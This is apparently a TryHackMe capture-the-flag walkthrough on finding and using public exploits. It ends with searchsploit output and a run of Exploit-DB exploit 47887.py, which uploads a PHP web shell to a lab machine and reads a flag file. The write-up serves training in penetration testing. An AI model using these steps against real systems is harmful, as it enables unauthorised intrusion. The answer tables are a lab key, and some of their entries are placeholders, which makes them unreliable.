OverView
Follow @anir0y | |
Exploit Vulnerabilities | |
Exploit Vulnerabilities [Subscription Required] | Exploit Vulnerabilities |
Task 01: Introduction
In this room, we are going to be going over some means of identifying vulnerabilities and coupling our research skills to learn how these can be abused.
Task 02: Automated Vs. Manual Vulnerability Research
There is a myriad of tools and services available in cybersecurity for vulnerability scanning. Ranging from being commercial (and footing a heavy bill) to open-source and free, vulnerability scanners are convenient means of quickly canvassing an application for flaws.
For example, the vulnerability scanner Nessus has both a free (community) edition and commercial. The commercial version costing thousands of pounds for a year’s license will likely be used in organisations providing penetration testing services or audits
I have detailed some of the advantages and disadvantages of using a vulnerability scanner in the table below:
Frameworks such as Metasploit often have vulnerability scanners for some modules; this is something you will come onto learn about in a further module in this pathway.
Manual scanning for vulnerabilities is often the weapon of choice by a penetration tester when testing individual applications or programs. In fact, manual scanning will involve searching for the same vulnerabilities and uses similar techniques as automated scanning.
Ultimately, both techniques involve testing an application or program for vulnerabilities. These vulnerabilities include:
If you are keen to learn more about these vulnerabilities, the OWASP framework will be a useful read to you.
Flag-02
question | ans |
---|---|
You are working close to a deadline for your penetration test and need to scan a web application quickly. Would you use an automated scanner? (Yay/Nay) | yay |
You are testing a web application and find that you are able to input and retrieve data in a database. What vulnerability is this? | injection |
You manage to impersonate another user. What vulnerability is this? | Broken Access Contrl |
Task 03: Finding Manual Exploits
Rapid7
Much like other services such as Exploit DB and NVE, Rapid7 is a vulnerability research database. The only difference being that this database also acts as an exploit database. Using this service, you can filter by type of vulnerability (I.e. application and operating system).
Additionally, the database contains instructions for exploiting applications using the popular Metasploit tool (you will learn about this tool in-depth later in the learning path). For example, this entry on Rapid7 is for “Wordpress Plugin SP Project & Document”, where we can see instructions on how to use an exploit module to abuse this vulnerability.
GitHub
GitHub is a popular web service designed for software developers. The site is used to host and share the source code of applications to allow a collaborative effort. However, security researchers have taken to this platform because of the aforementioned reasons as well. Security researchers store & share PoC’s (Proof of Concept) on GitHub, turning it into an exploit database in this context.
GitHub is extremely useful in finding rare or fresh exploits because anyone can create an account and upload – there is no formal verification process like there is with alternative exploit databases. With that said, there is also a downside in that PoC’s may not work where little to no support will be provided
GitHub uses a tagging and keyword system, meaning that we can search GitHub by keywords such as “PoC”, “vulnerability”, and many more. At the time of writing, there are 9,682 repositories with the keyword “cve”. We are also able to filter the results by programming language.
Searchsploit
Searchsploit is a tool that is available on popular pentesting distributions such as Kali Linux. It is also available on the TryHackMe AttackBox. This tool is an offline copy of Exploit-DB, containing copies of exploits on your system.
You are able to search searchsploit by application name and/or vulnerability type. For example, in the snippet below, we are searching searchsploit for exploits relating to Wordpress that we can use – no downloading necessary!
Flag-03
question | ans |
---|---|
What website would you use as a security researcher if you wanted to upload a Proof of Concept? | GitHub |
You are performing a penetration test at a site with no internet connection. What tool could you use to find exploits to use? | searchsploit |
Task 04: Example of Manual Exploitation
We can use the information gathered from task 2 in this room to exploit the vulnerable service. Ultimately, one of the most effective vulnerabilities that we can exploit is the ability to execute commands on the target that is running the vulnerable application or service.
For example, being able to execute commands on the target that is running the vulnerable application or service will allow us to read files or execute commands that we previously wouldn’t be able to perform using the application or service alone. Additionally, we can abuse this to gain what is known as a foothold to the machine. A foothold is an access to the vulnerable machine’s console, where we can then begin to exploit other applications or machines on the network.
We are going to use an exploit to perform remote code execution on the application from task 2 to be able to remotely execute commands on the vulnerable machine.
Before we start, it is important to note that exploits rarely come out of the box and are ready to be used. They often require some configuration before they will work for our environment or target. The level of configuration will vary upon the exploit, so you will often find multiple exploits for the same vulnerability on an application. It is up to you to figure out which exploit is the most appropriate or useful to you.
For example, in the snippet below, we can see that a few options have been changed to reflect the IP address of the machine that we are attacking from.
Once we have configured the exploit correctly, let’s further read this exploit to understand how to use it. In the snippet below, we can see that we need to provide two arguments when running the exploit:
With this information in mind, we are now ready to use this exploit on the vulnerable machine. We are going to do the following:
- Use the exploit to upload a malicious file to the vulnerable application containing whatever command we wish to execute, where the web server will run this malicious file to execute the code.
- The file will first contain a basic command that we will use to verify that the exploit has worked.
- Then we are going to read the contents of a file located on the vulnerable machine.
flag -04
question | ans |
---|---|
What type of vulnerability was used in this attack? | RCE |
Task 05: Practical: Manual Exploitation
Deploy the machine attached to this task and wait a minimum of five minutes for it to be fully set up. After five minutes, visit the webserver running on the machine by navigating to http://MACHINE_IP
in the browser of the device connected to the THM network (your own or the AttackBox).
5.1
Open IP in web-browser look into footer area:
5.2
look for vulnerability:
searchsploit online book store --------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------------------------- --------------------------------- GotoCode Online Bookstore - Multiple Vulnerabilities | asp/webapps/17921.txt Online Book Store 1.0 - 'bookisbn' SQL Injection | php/webapps/47922.txt Online Book Store 1.0 - Arbitrary File Upload | php/webapps/47928.txt Online Book Store 1.0 - Unauthenticated Remote Code Execution | php/webapps/47887.py --------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results
we have a
Unauthenticated Remote Code Execution
let’s use this to exploit the application.copy the exploit:
searchsploit -m php/webapps/47887.py
run the exploit:
python 47887.py http://10.10.18.54 > Attempting to upload PHP web shell... > Verifying shell upload... > Web shell uploaded to http://10.10.18.54/bootstrap/img/PQytuI1suX.php > Example command usage: http://10.10.18.54/bootstrap/img/PQytuI1suX.php?cmd=whoami > Do you wish to launch a shell here? (y/n): y RCE $ cat flag.txt flag{here}
Flag-05
question | ans |
---|---|
Find out the version of the application that is running. What are the name and version number of the application? | 5.1 |
Now use the resources and skills from this module to find an exploit that will allow you to gain remote access to the vulnerable machine. | n\a |
Use this exploit against the vulnerable machine. What is the value of the flag located in a web directory? | 5.2 |